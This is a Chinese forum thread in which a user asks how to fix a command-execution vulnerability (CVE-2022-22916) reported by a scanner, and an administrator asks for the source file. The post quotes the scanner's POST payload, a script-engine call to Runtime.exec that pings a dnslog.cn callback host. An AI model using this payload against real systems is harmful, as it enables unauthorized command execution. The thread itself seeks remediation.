查看: 2845|回复: 1

命令执行漏洞修改(CVE-2022-22916)

升级   1.33%

18

主题

38

帖子

204

积分

中级会员

Rank: 3Rank: 3

积分
204
发表于 2022-6-9 17:39:27 | 显示全部楼层 |阅读模式
系统运行漏洞扫描,提出了命令执行漏洞(CVE-2022-22916
POST数据:
var p =java.lang.Runtime.getRuntime().exec('ping jhglcg.dnslog.cn');
var sc =newjava.util.Scanner(p.getInputStream(),"GBK").useDelimiter("\\A");
varresult = sc.hasNext() ? sc.next() : "";
sc.close();

这个漏洞怎样进行修改?


回复

使用道具 举报

Ray

升级   100%

31

主题

233

帖子

861

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
861
发表于 2022-6-10 10:12:01 | 显示全部楼层
这个代码在那里的?请把源文件发出来
回复

使用道具 举报

发表回复

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

联系客服 关注微信 下载APP 返回顶部 返回列表
viewthread